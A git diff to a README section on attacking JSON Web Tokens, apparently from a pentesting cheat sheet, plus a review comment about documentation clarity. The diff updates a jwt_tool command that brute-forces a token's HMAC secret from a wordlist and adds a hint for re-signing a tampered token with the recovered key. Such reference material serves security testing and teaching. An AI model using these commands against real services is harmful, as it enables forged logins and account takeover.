diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index e186299..b7915a2 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -188,20 +188,23 @@ First, bruteforce the "secret" key used to compute the signature. ```powershell git clone https://github.com/ticarpi/jwt_tool -python2.7 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI /tmp/wordlist +python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C -Token header values: -[+] alg = HS256 -[+] typ = JWT + \ \ \ \ \ \ + \__ | | \ |\__ __| \__ __| | + | | \ | | | \ \ | + | \ | | | __ \ __ \ | + \ | _ | | | | | | | | + | | / \ | | | | | | | | +\ | / \ | | |\ |\ | | + \______/ \__/ \__| \__| \__| \______/ \______/ \__| + Version 2.2.2 \______| @ticarpi -Token payload values: -[+] sub = 1234567890 -[+] role = user -[+] iat = 1516239022 +Original JWT: -File loaded: /tmp/wordlist -Testing 5 passwords... [+] secret is the CORRECT key! +You can tamper/fuzz the token contents (-T/-I) and sign it using: +python3 jwt_tool.py [options here] -S HS256 -p "secret" ``` Then edit the field inside the JSON Web Token. 
@@ -279,4 +282,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) - [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) -- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass) \ No newline at end of file +- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass)
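Review bot: In the first hunk (README.md, @@ -188), the new invocation `python3 jwt_tool.py ... -d /tmp/wordlist -C` replaces the old positional wordlist argument with two flags that the surrounding text never explains. Please add a short sentence or inline comment saying what `-d` and `-C` select, so that readers on a different jwt_tool version can map the command to their own. The replacement sample output also pastes the ASCII banner together with `Version 2.2.2`, which will go stale and pushes the one line that matters, `[+] secret is the CORRECT key!`, further down. I would drop the banner and keep only the result and the follow-up hint (`-S HS256 -p "secret"`). `Original JWT:` is left with nothing after it, so either show the token there or remove the line. Finally, the fence is still tagged `powershell` although it holds `git`/`python3` commands and tool output; splitting the command and the output into separate blocks with fitting tags would read better.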